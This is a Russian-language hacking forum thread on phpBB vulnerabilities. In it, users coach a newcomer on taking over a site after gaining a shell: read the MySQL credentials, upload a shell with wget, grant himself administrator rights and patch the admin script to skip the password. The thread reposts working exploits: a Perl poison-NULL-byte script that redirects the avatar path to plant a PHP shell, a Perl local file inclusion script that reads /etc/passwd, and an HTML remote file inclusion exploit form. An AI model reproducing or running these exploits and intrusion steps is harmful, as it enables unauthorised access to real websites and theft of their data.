• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: phpBB

Отслеживать
Furius
1) жжошь. нафиг замазывал в тексте окна адрес, а в заголовке не замазал)
2) лоооооооооооооооол. у тебя шелл, а ему админка нужна. жесть =\ а может это и не шелл - там не понятно. я не юзал этот сплоит, но приглашение похоже на bash'евское))
 
Furius
что вводить в шелле? man bash :lol2:
а реально - посмотри в конфиге параметры доступа к MySQL, залей веб-программулину для управдения mysql из веба, типа рстшной или моей ( =)) и ставь себе группу Администратор +)
 
Смотри план твоих действий

ты пишешь GET http:/site.com/shell.php или wget можешь юзать х3 и заливай допустим в images ( куда права позволяют ) далее ты можешь поправить админ скрипт phpbb таким образом чтобы он пускал тебя без паса

Можно и без шела но с ним удобнее :)
 
gemaglabin
ну как вариант - сойдет. только админ пропалит все равно доступы в админку - это раз. два - раз он спрашивает, что вводить в шелле (буагаг), ты думаешь, что он знает, как править скрипт админки? наивный))
 
2006-09-11 phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit
Rated as : Critical

Код: 
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian):
[url=http://www.security.nnov.ru/Odocument221.html]http://www.security.nnov.ru/Odocument221.html[/url]
# 
# Poison  NULL  byte vulnerability for perl CGI applications was
described
# in  [1].  ShAnKaR  noted, that same vulnerability also affects
different
# PHP  applications.  An  example of vulnerable applications are phpBB
and
# punBB.
# 
# Vulnerability  can  be  used  to  upload  or  replace arbitrary files
on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to
filename.
# 
# In  case  of  phpBB and punBB vulnerability can be exploited by
changing
# location  of avatar file and uploading avatar file with PHP code in
EXIF
# data.
# 
# A PoC exploit to change Avatar file location for phpBB:
# 
# 

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible;
Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
вобшчем вот , непонел что к чему , ккоито он непонетный ... что собстно в командной строке ввести нужно ...
 
шото типа загрузки шелла через аватор

Код: 
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n"}
 
Код: 
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass
images/avatars/shell.php [d(DEBUG)]\n"}
угу,указываем путь к форуму логин админа + его пасс
 
Только что не по злоботе душевной, а по недоумию вот тут (версия 2.0.20) взял и перебил себе user_id на 0. Результат обрадовал: на главной странице (мой акк админский) меня не видно совсем (онлайн: 0 зарегеных, 0 гостей, 0 скрытых). Мой профиль просмотреть тоже нельзя, но залогиниться и постить я могу. В админку тоже пускает, но там меня видно. :(

Добавлено: Указанный выше эксплоит что-то не сработал (права админа есть, аватары заливаются нормально).

Есть такой вопрос (не сочтите за глупость): Вот пример инъекции; число постов стандартное. Объясните, пожалуйста, почему оно на всех "похаканных" форумах такое? Оттого, что Кидди не может скрипт поправить, или оттого, что эта инъекция делается через средства форума, и число получается само по себе? Для меня это реально важно... :help:

И напоследок, что можно сделать с форумом phpBB 2.0.19, если прав нет, а HTML-код вырублен?
 
Программа: phpBB 2.0.21, возможно более ранние версии.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и CSRF атаку.

1. Уязвимость существует из-за того, что приложение не проверяет валидность HTTP запроса при отправке сообщений. Злоумышленник может с помощью специально сформированной Web страницы отправить пользователям произвольные сообщения.

2. Уязвимость существует из-за недостаточной обработки входных данных в поле "Message body" в сценарии privmsg.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: www.phpbb.com

Решение: Способов устранения уязвимости не существует
 
Программа: eXtreme Styles (модуль к phpBB) 2.4.0 и более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным на системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpEx" в сценарии admin/admin_xs.php. Удаленный пользователь может с помощью специально сформированного запроса, содержащего символы обхода каталога, просмотреть содержимое произвольных файлов на системе.

URL производителя: www.stsoftware.biz/forum/showthread.php?t=94

Решение: Способов устранения уязвимости не существует в настоящее время.

Код: 
 ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
          .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
          ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
          .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
          ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
          .................................................................

[+] Software: phpBB Module XS 2.3.1
[+] Vendor: http://www.phpbbmods.de
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3

[~] Vulnerability found by: bd0rk
[~] Contact: bd0rk[at]hackermail.com
[~] Website: http://www.soh-crew.it.tt
[~] Greetings: str0ke, TheJT, maria

[+] Vulnerable Code in /admin/admin_xs.php line 33
[+] Code: include_once('xs_include.' . $phpEx);
[+] It is a local file inclusion

[+]Exploitcode:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
print "\t\t+                                                 +\n\n";
print "\t\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\n\n";
print "\t\t+                                                 +\n\n";
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";

if (!$ARGV[0])
{
print "Usage: expl.pl [target]\n";
print "Example: expl.pl http://127.0.0.1/directory/admin/\n";
}

else
{
$web=$ARGV[0];
chomp $web;

$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc/passwd%00";

my $web1=$web.$file;
print "$web1\n\n";
my $agent = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $agent->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "This is vulnerable\n";
}
else
{
print "It is not vulnerable\n";
}
}
 
Цель: phpBB Add-on Fishing Cat Portal
Воздействие: Выполнение произвольных команд

Код: 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</title>

<script language="JavaScript">

//'Bug found and Exploit coded by bd0rk
//'Vendor: http://www.foxymods-phpbb.com/
//'Download: http://www.foxymods-phpbb.com/download.php?id=7
//'Contact: bd0rk[at]hackermail.com

//'Vulnerable Code in line 21: include_once($phpbb_root_path . 'includes/lite.'.$phpEx);
//'$phpbb_root_path is not declared before include
//'Greetings: str0ke, TheJT, rgod, Frauenarzt

//#The german Hacker bd0rk

var dir="/includes/"
var file="/functions_portal.php?"
var parameter ="phpbb_root_path="
var shell="Insert your shellcode here"

function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}

rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2"> </font></b>
  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
  <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p>

<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>

</html>
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх